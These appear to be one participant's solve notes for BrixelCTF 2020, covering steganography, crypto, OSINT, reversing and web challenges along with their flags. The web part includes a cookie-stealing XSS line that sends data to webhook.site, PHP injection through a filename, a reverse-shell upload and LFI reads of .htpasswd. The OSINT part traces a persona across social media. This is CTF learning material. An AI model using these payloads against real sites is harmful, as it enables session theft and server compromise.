@codeskill
2020-12-26
https://ctf.brixel.space/
solve.sh
./solve.sh
solve.py
brixelCTF{sp33d_d3m0n}
solve.py
brixelCTF{48373851}
Copy the song and paste into https://codewithrockstar.com/online
brixelCTF{5667236346614}
brixelCTF{kn0wl3dg3}
Download the app > Robot32 - SSTV Image Decoder
Listen the wav file and wait for the render image
SSTV in Scottie1-Mode
brixelCTF{SP4C3L4B}
brixelCTF{203}
foremost extract .wav
decode the dtmf in the wave file
you get the transaction reason
cocaine
brixelCTF{cocaine}
3.05.13
https://www.openstreetmap.org/search?query=airport in limburg#map=11/51.0996/5.4437
https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers
Google Lens o Yandex images
Eben-Ezer Tower
brixelCTF{Eben-Ezer}
Facts:
Johnny Dorfmeister
: Taken from the EXIF-data of the image
pishapasha
: Googling the name takes you to this Linkedin-profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
fav food: macaroni
Taken from https://www.instagram.com/JohnnyDorfmeister/
bday: tbd
w@yb@ck!
: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1)
poetry
: Translate the russian text on howitshould.be with google.
Fill in the contact form and his address will be presented
"just_married": With google street view on the address from no. 7, move back in time
g1ttern00b
: Username "johnny", Password "letmein" taken from old commit on github
Cheatengine
search for the cookie amount
increase it
done
strings on the exe
strings on exe
create a file called register.key
start the exe
uploda the punchcard here:
https://www.masswerk.at/cardreader/
brixelCTF{M41NFR4M3}
Download the SWF
Extract the content
then again
search through the files till you find the flag
message.wav
theflagforthischallengeis seagull
brixelCTF{seagull}
vigenere with "confidentiel" as the key:
brixelCTF{baguette}
rot 21
brixelCTF{pizzanapoli}
base64 decode + binary decode
brixelCTF{robocop}
qbhbh zrmua gfbld ocqbv
derflagistsauerkraut
the flag is sauerkraut
brixelCTF{sauerkraut}
Username:admin
Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06
brixelCTF{notsecure}
brixelCTF{brute}
unzip loremipsum.docx
unzip loremipsum
cat flag.txt
flag = openxml
brixelCTF{openxml}
Audacity > Spectrogram
brixelCTF{hellokitty}
brixelCTF{m4st3r_0f_sc4n5}
steghide info rufus.jpg
steghide extract -sf rufus.jpg
less steganopayload639.txt
brixelCTF{chucktesta}
brixelCTF{notsosecret}
5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
View page source code and find konami
/* <![CDATA[ */ var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"}; /* ]]> */
http://brixel.be/wp-content/uploads/2016/10/15908854_90x90.png.gif
brixelCTF{Mario}
wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg
strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}
brixelCTF{happy_holidays}
https://ctf.brixel.space/guide
brixelCTF{freepoints}
http://timesink.be/robotopia/robots.txt
brixelCTF{sadr0b0tz}
plain text in javascript source
brixelCTF{w0rst_j4v4scr1pt_3v3r!}
brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}
http://timesink.be/login3/password.txt
brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}
http://timesink.be/login4/password.txt + base64 decode
brixelCTF{even_base64_wont_make_you_secure}
brixelctf{0bfuscati0n}
Google search to identify user-agent used by "ask jeeves crawler"
curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'
brixelCTF{askwho?}
brixelCTF{bakpau}
brute force usname and login here: http://timesink.be/flatearth/admin.php
brixelCTF{aroundtheglobe}
Upload reverse shell here:
http://timesink.be/dadjokes/jokes/submit.php
File Read:
http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt
http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\
The Solution is to fix the Page. This gives you the solution
document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')
The index.php is used to load files without any limit, so only access:
http://timesink.be/pathfinder/index.php?page=admin/.htpasswd
brixelCTF{unsafe_include}
The index.php is used to load files without any limit, so only access:
http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php
brixelCTF{outdated_php}